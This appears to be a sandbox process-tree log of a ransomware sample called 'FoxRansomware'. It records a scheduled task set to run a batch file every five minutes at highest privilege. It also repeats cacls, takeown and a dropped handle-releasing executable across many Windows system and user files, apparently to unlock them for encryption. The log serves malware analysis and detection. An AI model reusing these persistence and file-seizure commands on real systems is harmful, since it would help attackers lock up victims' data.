C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\ahfCmCvc.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵PID:5240
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\ahfCmCvc.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:5580
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:3584
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:2128
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\USOPrivate\UpdateStore\store.db""2⤵
- Suspicious use of WriteProcessMemory
PID:4432 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:2288
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOPrivate\UpdateStore\store.db"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4660
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "store.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4792 -
C:\Users\Admin\AppData\Local\Temp\otHboBGk64.exeotHboBGk.exe -accepteula "store.db" -nobanner5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:2532
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db""2⤵
- Suspicious use of WriteProcessMemory
PID:5348 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db" /E /G Admin:F /C3⤵PID:5400
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db"3⤵PID:5416
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "ActivitiesCache.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:5432 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "ActivitiesCache.db" -nobanner4⤵
- Executes dropped EXE
PID:5568
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5956
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""2⤵PID:3488
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:4924
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵PID:3236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "store.db" -nobanner3⤵PID:3996
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
PID:3068
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3888
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa""2⤵PID:5184
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:4360
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa"3⤵PID:5992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "classes.jsa" -nobanner3⤵PID:5852
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:5660
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5384
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa""2⤵PID:2544
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:5232
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:5684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "classes.jsa" -nobanner3⤵PID:5948
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:3116
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3572
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml""2⤵PID:5380
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml" /E /G Admin:F /C3⤵PID:4040
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "AssemblyList_4_client.xml" -nobanner3⤵PID:5808
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "AssemblyList_4_client.xml" -nobanner4⤵
- Executes dropped EXE
PID:5584
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""2⤵PID:5796
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C3⤵PID:5220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5172
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "behavior.xml" -nobanner3⤵PID:5644
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "behavior.xml" -nobanner4⤵
- Executes dropped EXE
PID:5892
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6084
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\uk-UA\resource.xml""2⤵PID:5592
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\uk-UA\resource.xml" /E /G Admin:F /C3⤵PID:5964
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\uk-UA\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "resource.xml" -nobanner3⤵PID:4924
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:5800
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6140
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml""2⤵PID:5124
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml" /E /G Admin:F /C3⤵PID:5308
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner3⤵PID:5880
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner4⤵
- Executes dropped EXE
PID:5664
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6088
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml""2⤵PID:4880
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml" /E /G Admin:F /C3⤵PID:5272
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner3⤵PID:3860
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner4⤵
- Executes dropped EXE
PID:5340
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2420
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml""2⤵PID:5292
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml" /E /G Admin:F /C3⤵PID:2544
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner3⤵PID:3592
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner4⤵
- Executes dropped EXE
PID:5464
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5788
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""2⤵PID:5988
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C3⤵PID:5680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner3⤵PID:5872
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner4⤵
- Executes dropped EXE
PID:3200
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""2⤵PID:5336
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:5416
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5304
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "resource.xml" -nobanner3⤵PID:5500
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:5284
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5308
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""2⤵PID:6096
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:6128
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "resource.xml" -nobanner3⤵PID:5732
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:4720
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4320
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml""2⤵PID:4764
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml" /E /G Admin:F /C3⤵PID:5396
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner3⤵PID:3544
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner4⤵
- Executes dropped EXE
PID:5344
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:820
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml""2⤵PID:6068
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml" /E /G Admin:F /C3⤵PID:5920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner3⤵PID:3276
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner4⤵
- Executes dropped EXE
PID:212
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4884
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml""2⤵PID:4300
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml" /E /G Admin:F /C3⤵PID:6032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner3⤵PID:636
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner4⤵
- Executes dropped EXE
PID:6128
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5360
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.11182604-f7e5-464d-bd44-d178c6d0dbd8.1.etl""2⤵PID:688
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.11182604-f7e5-464d-bd44-d178c6d0dbd8.1.etl" /E /G Admin:F /C3⤵PID:5524
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.11182604-f7e5-464d-bd44-d178c6d0dbd8.1.etl"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2480
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "UpdateSessionOrchestration.11182604-f7e5-464d-bd44-d178c6d0dbd8.1.etl" -nobanner3⤵PID:5580
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "UpdateSessionOrchestration.11182604-f7e5-464d-bd44-d178c6d0dbd8.1.etl" -nobanner4⤵
- Executes dropped EXE
PID:3708
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2232
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1""2⤵PID:3368
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C3⤵PID:5616
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "OfficeIntegrator.ps1" -nobanner3⤵PID:2596
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "OfficeIntegrator.ps1" -nobanner4⤵
- Executes dropped EXE
PID:2936
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4008
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml""2⤵PID:5656
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml" /E /G Admin:F /C3⤵PID:5184
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "AssemblyList_4_extended.xml" -nobanner3⤵PID:4400
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "AssemblyList_4_extended.xml" -nobanner4⤵
- Executes dropped EXE
PID:5448
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6008
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.5a8acab2-b4f3-4bc7-8b44-69d649719af5.1.etl""2⤵PID:440
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\WuProvider.5a8acab2-b4f3-4bc7-8b44-69d649719af5.1.etl" /E /G Admin:F /C3⤵PID:2208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.5a8acab2-b4f3-4bc7-8b44-69d649719af5.1.etl"3⤵PID:3576
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "WuProvider.5a8acab2-b4f3-4bc7-8b44-69d649719af5.1.etl" -nobanner3⤵PID:5508
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "WuProvider.5a8acab2-b4f3-4bc7-8b44-69d649719af5.1.etl" -nobanner4⤵
- Executes dropped EXE
PID:5736
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5792
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm""2⤵PID:5512
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm" /E /G Admin:F /C3⤵PID:1752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm"3⤵
- Modifies file permissions
PID:1456
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "ActivitiesCache.db-shm" -nobanner3⤵PID:5688
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "ActivitiesCache.db-shm" -nobanner4⤵
- Executes dropped EXE
PID:4040
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4212
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""2⤵PID:5520
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C3⤵PID:2480
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"3⤵PID:5476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "behavior.xml" -nobanner3⤵PID:6140
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "behavior.xml" -nobanner4⤵
- Executes dropped EXE
PID:5176
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6020
-
-
-
